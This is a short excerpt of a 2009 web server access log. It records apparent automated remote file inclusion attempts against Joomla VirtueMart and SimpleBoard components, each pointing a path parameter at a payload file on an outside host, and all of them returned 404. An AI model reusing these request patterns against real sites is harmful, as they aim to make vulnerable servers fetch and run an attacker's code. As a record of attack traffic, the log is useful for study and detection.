123.143.98.5 - - [12/Jun/2009:04:00:21 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dmpacking.com/bbs/data/main/mawar.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.149.105.23 - - [12/Jun/2009:04:00:21 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
213.149.105.23 - - [12/Jun/2009:04:00:21 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://aldeanos.com/WEB-INF/lib/.../id2.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
